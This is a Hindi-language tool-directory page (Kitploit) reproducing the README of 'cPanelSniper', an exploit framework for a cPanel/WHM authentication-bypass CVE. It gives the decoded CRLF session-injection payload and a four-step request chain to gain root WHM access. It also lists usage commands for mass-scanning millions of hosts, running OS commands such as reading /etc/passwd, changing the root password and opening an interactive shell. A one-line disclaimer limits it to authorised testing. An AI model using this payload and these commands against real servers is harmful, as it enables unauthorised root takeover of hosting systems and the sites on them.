Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cpsniper — cPanelSniper STABLE - CVE-2026-41940, 10M+ लक्ष्यों के लिए अनुकूलित | Kitploit
उपकरण/GitHubGitHub/44pie/cpsniper
प्रमाणीकरण और प्राधिकरणभेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंग
GitHub44pie/cpsniper

cpsniper

cPanelSniper STABLE - CVE-2026-41940, 10M+ लक्ष्यों के लिए अनुकूलित

रिपॉजिटरी देखें
2214 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

cPanelSniper

cPanelSniper

Python CVE cPanel stdlib pipeline Author

CVE-2026-41940 — cPanel और WHM में सत्र-फ़ाइल CRLF इंजेक्शन के माध्यम से प्रमाणीकरण बायपास
4-चरणीय शोषण श्रृंखला · इंटरैक्टिव WHM शेल · 10M+ लक्ष्यों के लिए TRUE STABLE · शून्य मेमोरी उपयोग · केवल stdlib


अवलोकन

cPanelSniper CVE-2026-41940 के लिए एक केंद्रित शोषण फ्रेमवर्क है, जो cPanel और WHM को प्रभावित करने वाली एक गंभीर प्रमाणीकरण बायपास भेद्यता है। यह भेद्यता बिना किसी वैध क्रेडेंशियल के, Authorization HTTP हेडर के माध्यम से सत्र फ़ाइल में CRLF अनुक्रम इंजेक्ट करके, बिना प्रमाणीकृत दूरस्थ हमलावरों को रूट-स्तरीय WHM एक्सेस प्राप्त करने की अनुमति देती है।

  • CVSS स्कोर: 10.0 (गंभीर)
  • जंगली में शोषण: पुष्टि (अप्रैल 2026)
  • प्रभावित इंस्टॉलेशन: cPanel और WHM चलाने वाले ~70 मिलियन डोमेन
  • कोई निर्भरता नहीं: शुद्ध Python stdlib — कोई pip नहीं, कोई requests नहीं, कोई बाहरी पैकेज नहीं

केवल अधिकृत पैठ परीक्षण और बग बाउंटी कार्यक्रमों के लिए।


⚡ TRUE STABLE संस्करण

यह संस्करण शून्य मेमोरी उपयोग के साथ 10,000,000+ लक्ष्यों को स्कैन करने के लिए अनुकूलित है।

क्या ठीक किया गया

समस्यामूल संस्करणठीक किया गया संस्करण
मेमोरी उपयोगसभी लक्ष्यों को RAM में लोड करता हैलक्ष्यों को पंक्ति-दर-पंक्ति स्ट्रीम करता है (0 मेमोरी)
10M लक्ष्यOOM → मारा गया ❌सफलतापूर्वक पूर्ण होता है ✅
फिर से शुरूसमर्थित नहीं--resume फ़्लैग
प्रगतिकोई ETA नहींरीयल-टाइम ETA + दर + आँकड़े
परिणामकेवल अंत में सहेजे जाते हैंहर 60 सेकंड में सहेजे जाते हैं (कॉन्फ़िगर करने योग्य)

मुख्य विशेषताएं

  • स्ट्रीमिंग आर्किटेक्चर - मेमोरी में लोड किए बिना 10M+ लक्ष्यों को संसाधित करें
  • शून्य OOM क्रैश - बहुत बड़ी लक्ष्य सूचियों के साथ भी
  • ऑटो-रिज़्यूम - --resume के साथ जहाँ रुके थे वहाँ से जारी रखें
  • रीयल-टाइम प्रगति - ETA, स्कैन दर, त्रुटि ट्रैकिंग
  • आवधिक सहेजना - डेटा हानि को रोकने के लिए परिणाम स्वतः सहेजे जाते हैं
  • पाइपलाइन तैयार - subfinder, httpx, shodan के साथ सहजता से काम करता है

यह कैसे काम करता है

मूल कारण Session.pm में है: saveSession() फ़ंक्शन सत्र फ़ाइल को डिस्क पर लिखने के बाद filter_sessiondata() को कॉल करता है। इसका मतलब है कि Authorization: Basic हेडर मान में एम्बेडेड CRLF वर्ण सत्र फ़ाइल में वैसे ही लिखे जाते हैं, जिससे सैनिटाइज़ेशन से पहले हमलावर-नियंत्रित फ़ील्ड इंजेक्ट हो जाते हैं।

सामान्य प्रवाह:
  POST /login/ → filter_sessiondata() → सत्र लिखें → प्रमाणीकरण जाँच

कमजोर प्रवाह:
  POST /login/ → सत्र लिखें (CRLF पेलोड इंजेक्ट) → filter_sessiondata() → प्रमाणीकरण जाँच ज़हरीली फ़ाइल पढ़ती है

CRLF पेलोड

Authorization: Basic मान डिकोड होकर:

root:x
successful_internal_auth_with_timestamp=9999999999
user=root
tfa_verified=1
hasroot=1

ये फ़ील्ड सीधे डिस्क पर सत्र फ़ाइल में लिखे जाते हैं। जब वापस पढ़ा जाता है, तो cPanel सत्र को पूरी तरह से प्रमाणीकृत रूट सत्र के रूप में मानता है।

4-चरणीय शोषण श्रृंखला

┌─────────────────────────────────────────────────────────────┐
│  चरण 0 — कैनोनिकल होस्टनाम खोज                             │
│  GET /openid_connect/cpanelid → 307 → वास्तविक होस्टनाम     │
├─────────────────────────────────────────────────────────────┤
│  चरण 1 — प्री-ऑथ सत्र मिंट करें                             │
│  POST /login/?login_only=1  (गलत क्रेडेंशियल)               │
│  ← 401 + whostmgrsession कुकी                                │
├─────────────────────────────────────────────────────────────┤
│  चरण 2 — CRLF इंजेक्शन                                      │
│  GET / + Cookie: session + Authorization: Basic <payload>   │
│  cpsrvd CRLF फ़ील्ड को सत्र फ़ाइल में लिखता है              │
│  ← 307 Location: /cpsessXXXXXXXXXX/...                     │
├─────────────────────────────────────────────────────────────┤
│  चरण 3 — प्रचार (do_token_denied गैजेट)                     │
│  GET /scripts2/listaccts                                    │
│  raw→cache फ्लश ट्रिगर करता है — इंजेक्टेड फ़ील्ड सक्रिय हो जाते हैं │
│  ← 401 टोकन अस्वीकृत (अपेक्षित)                             │
├─────────────────────────────────────────────────────────────┤
│  चरण 4 — WHM रूट एक्सेस सत्यापित करें                       │
│  GET /cpsessXXXXXXXXXX/json-api/version                     │
│  ← 200 {"version":"11.x.x.x","result":1}  = PWNED          │
└─────────────────────────────────────────────────────────────┘

प्रभावित संस्करण

शाखाकमजोरपैच किया गया
110.x≤ 11.110.0.9611.110.0.97
118.x≤ 11.118.0.6211.118.0.63
126.x≤ 11.126.0.5311.126.0.54
132.x≤ 11.132.0.2811.132.0.29
134.x≤ 11.134.0.1911.134.0.20
136.x≤ 11.136.0.411.136.0.5

स्थापना

git clone https://github.com/44pie/cpsniper
cd cpsniper
python3 cPanelSniper.py --help

कोई pip इंस्टॉल आवश्यक नहीं है। केवल शुद्ध Python 3.8+ stdlib।


उपयोग

बुनियादी स्कैन

# एकल लक्ष्य — केवल स्कैन
python3 cPanelSniper.py -u https://target.com:2087

# एकल लक्ष्य — बायपास के बाद इंटरैक्टिव शेल
python3 cPanelSniper.py -u https://target.com:2087 --action shell

# बड़ी लक्ष्य सूची — 10M+ लक्ष्य (TRUE STABLE)
python3 cPanelSniper.py -l targets.txt -t 50 -o results.json

# बाधित स्कैन फिर से शुरू करें
python3 cPanelSniper.py -l targets.txt -t 50 -o results.json --resume

पोस्ट-एक्सप्लॉइट क्रियाएँ

# सर्वर पर सभी cPanel खाते सूचीबद्ध करें
python3 cPanelSniper.py -u https://target.com:2087 --action list

# OS कमांड निष्पादित करें
python3 cPanelSniper.py -u https://target.com:2087 --action cmd --cmd "id;whoami;uname -a"
python3 cPanelSniper.py -u https://target.com:2087 --action cmd --cmd "ls /home"
python3 cPanelSniper.py -u https://target.com:2087 --action cmd --cmd "cat /etc/passwd"

# सर्वर जानकारी प्राप्त करें (होस्टनाम, लोड, डिस्क, MySQL होस्ट)
python3 cPanelSniper.py -u https://target.com:2087 --action info

# cPanel संस्करण प्राप्त करें
python3 cPanelSniper.py -u https://target.com:2087 --action version

# रूट पासवर्ड बदलें
python3 cPanelSniper.py -u https://target.com:2087 --action passwd --passwd 'NewPass@2026!'

# इंटरैक्टिव WHM शेल
python3 cPanelSniper.py -u https://target.com:2087 --action shell

पाइपलाइन (बड़ी सूचियों के लिए TRUE STABLE)

# subfinder → httpx → फ़ाइल में सहेजें → 10M+ लक्ष्य स्कैन करें
subfinder -d target.com -silent | \
  httpx -silent -ports 2087,2086 -threads 50 > targets.txt
python3 cPanelSniper.py -l targets.txt -t 50 -o results.json

# स्कोप सूची से - लाखों डोमेन संभालें
cat scope.txt | \
  httpx -silent -ports 2087,2086 -threads 100 > targets.txt
python3 cPanelSniper.py -l targets.txt -t 50 -o results.json --resume
टूल डाउनलोड करें